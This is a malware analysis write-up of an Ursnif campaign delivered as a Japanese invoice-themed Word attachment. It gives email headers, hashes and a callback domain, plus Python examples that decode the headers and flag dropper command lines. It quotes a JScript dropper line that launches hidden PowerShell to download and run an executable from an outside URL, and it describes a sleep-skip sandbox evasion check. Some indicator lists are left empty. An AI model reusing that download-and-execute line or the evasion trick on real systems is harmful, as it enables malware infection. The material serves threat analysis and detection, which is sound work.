Malware Delivery Method
docx attachment in email
Document sent as an attachment in the following email:
Subject: =?iso-2022-jp?B?OBskQjduISI4NjJBQEE1YT1xJEckOSEjGyhC?=
From: =?iso-2022-jp?B?GyRCQTBFRBsoQiAbJEJCc0thGyhC?= <[email protected]>
To: <[email protected]>
Original attachment name: 原価請求書です277253.docx ("copy of Invoice" when translated)
MD5 hash: 85d09006634ab5f2138ac927997accda
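The Subject and From headers above are RFC 2047 encoded-words in iso-2022-jp, which is why they look like base64 noise in the raw mail. The following is an added example (not code from the original write-up) showing how an analyst decodes such headers with the Python standard library; the two encoded values are the ones quoted above, while the sender address is a constructed placeholder because the real address is not reproduced on the page.

```python
"""Decode the RFC 2047 encoded-word headers of a phishing mail.

Added example, not part of the original write-up. The encoded Subject and
From values are the ones quoted in the write-up; the sender address is a
constructed placeholder (example.invalid) because the real one is not on the page.
"""
from email.header import decode_header, make_header
from email.utils import parseaddr

# Constructed sample: the two encoded-word headers quoted in the write-up,
# with a placeholder address standing in for the real sender.
SAMPLE_HEADERS = {
    "Subject": "=?iso-2022-jp?B?OBskQjduISI4NjJBQEE1YT1xJEckOSEjGyhC?=",
    "From": "=?iso-2022-jp?B?GyRCQTBFRBsoQiAbJEJCc0thGyhC?= <sender@example.invalid>",
}


def decode_rfc2047(value):
    """Decode every =?charset?encoding?text?= word in a header value.

    decode_header() splits the value into (bytes, charset) chunks and
    make_header() reassembles them as a str, so the iso-2022-jp escape
    sequences (ESC $ B ... ESC ( B) become readable Japanese text.
    """
    return str(make_header(decode_header(value)))


def decode_sender(value):
    """Return (display_name, address) for a From header, after decoding."""
    return parseaddr(decode_rfc2047(value))


def looks_encoded(value):
    """True if a header value still carries an undecoded encoded-word."""
    return "=?" in value and "?=" in value


def triage_headers(headers):
    """Decode the lure-relevant headers into plain strings for a report."""
    subject = decode_rfc2047(headers["Subject"])
    name, addr = decode_sender(headers["From"])
    return {"subject": subject, "sender_name": name, "sender_addr": addr}


if __name__ == "__main__":
    for key, value in triage_headers(SAMPLE_HEADERS).items():
        print(f"{key}: {value}")
```

The decoded subject reads as an ordinary Japanese invoice notice, which is the point of the lure: the raw base64 hides the wording from a quick English-language glance, but not from a mail gateway that decodes headers before applying keyword rules.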
Below are the unique sender email addresses observed in the Ursnif campaign which are sending the malicious Documents as email attachments:
And below are the spoofed addresses:
- Detects sleep short-circuiting by checking the time difference between timestamps taken before and after the Sleep function is invoked (a sandbox that skips or shortens the sleep returns too quickly, so the script can tell it is being analysed).
TJoMcZPXpCNhHVlsn = new Date()[piUCkfeTbuHWBQdaRl]();
qWBKNMtLEHISpva = new Date()[piUCkfeTbuHWBQdaRl]();
lhzYcTRDtUorLVmdP.ShellExecute("cmd.eXE", "/c ping localhost & powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('https://aedwards.co/wp-includes/IXR/get.php?jgTbz','%appdata%xJr23.eXe'); sTarT-PROcess '%appdAta%xJr23.exe'", "", "open", 0);
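The dropper fragment above combines a timing probe (the two Date() reads around the sleep) with a ShellExecute that hands a mixed-case PowerShell one-liner to cmd.exe. As an added example (not code from the original write-up), the script below normalises the curly quotes that web extraction leaves in such snippets, pulls the download URL and drop path out of the DownloadFile call, flags the command-line switches defenders commonly alert on, and checks the JScript text for the paired timestamp reads that mark a sleep-skip probe. The sample strings are constructed from the lines quoted above; the marker names and scoring are this example's own, not the write-up's.

```python
"""Triage helper for a JScript dropper of the kind shown in the write-up.

Added example, not code from the original write-up. Sample input is
constructed from the quoted dropper lines; marker names are this example's own.
"""
import re

# Constructed sample: the ShellExecute command argument quoted in the write-up,
# including the curly quotes that web extraction left in it.
SAMPLE_COMMAND = (
    "/c ping localhost & powershell.exe -executionpolicy bypass -noprofile "
    "-windowstyle hidden (new-object system.net.webclient).downloadfile("
    "\u2018https://aedwards.co/wp-includes/IXR/get.php?jgTbz\u2019,"
    "\u2019%appdata%xJr23.eXe\u2019); sTarT-PROcess \u2018%appdAta%xJr23.exe'"
)

# Constructed sample: the surrounding JScript with its two timestamp reads.
SAMPLE_SCRIPT = (
    "TJoMcZPXpCNhHVlsn = new Date()[piUCkfeTbuHWBQdaRl]();\n"
    "WScript.Sleep(30000);\n"
    "qWBKNMtLEHISpva = new Date()[piUCkfeTbuHWBQdaRl]();\n"
    'lhzYcTRDtUorLVmdP.ShellExecute("cmd.eXE", "' + SAMPLE_COMMAND + '", "", "open", 0);\n'
)

# Each marker is a regex matched case-insensitively: the dropper mixes case
# (sTarT-PROcess, cmd.eXE) precisely to dodge naive string matching.
SUSPICIOUS_MARKERS = {
    "execution_policy_bypass": r"-executionpolicy\s+bypass",
    "hidden_window": r"-windowstyle\s+hidden",
    "no_profile": r"-noprofile",
    "webclient_download": r"downloadfile\s*\(",
    "drop_in_appdata": r"%appdata%",
    "launch_dropped_file": r"start-process",
    "ping_delay": r"ping\s+localhost",
}

_QUOTE_MAP = str.maketrans({"\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"'})


def normalise_quotes(text):
    """Map curly quotes (U+2018/2019/201C/201D) to their ASCII forms."""
    return text.translate(_QUOTE_MAP)


def extract_download(command):
    """Return (url, drop_path) from a WebClient.DownloadFile(url, path) call, or None."""
    m = re.search(r"downloadfile\s*\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)",
                  normalise_quotes(command), re.IGNORECASE)
    return (m.group(1), m.group(2)) if m else None


def score_command(command):
    """List the suspicious switches present and the IoCs recovered from them."""
    text = normalise_quotes(command)
    hits = [name for name, pat in SUSPICIOUS_MARKERS.items()
            if re.search(pat, text, re.IGNORECASE)]
    return {"hits": hits, "score": len(hits), "download": extract_download(text)}


def has_sleep_probe(script):
    """True if the script reads a timestamp at least twice and also spawns a process.

    Two Date() reads with a ShellExecute in the same script is the shape of the
    sleep short-circuit check described in the write-up; on its own it is a
    weak signal, so it is reported separately rather than added to the score.
    """
    date_reads = len(re.findall(r"new\s+Date\s*\(\s*\)", script))
    spawns = re.search(r"\.ShellExecute\s*\(", script) is not None
    return date_reads >= 2 and spawns


if __name__ == "__main__":
    print(score_command(SAMPLE_COMMAND))
    print("sleep probe:", has_sleep_probe(SAMPLE_SCRIPT))
```

Running it on the sample returns every marker, so a rule requiring, say, three of the seven would already fire on the bare command line without any knowledge of the obfuscated variable names. The URL and drop path come out as-is, which makes the same function a cheap IoC extractor for a batch of quarantined attachments.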
MD5 hash of the downloaded payload:
Downloaded payload will perform the following Network Callback post execution:
Interesting callback domain name:
antispam.city (how ironic)
Whois info shows that this domain was recently registered on 14th August 2017.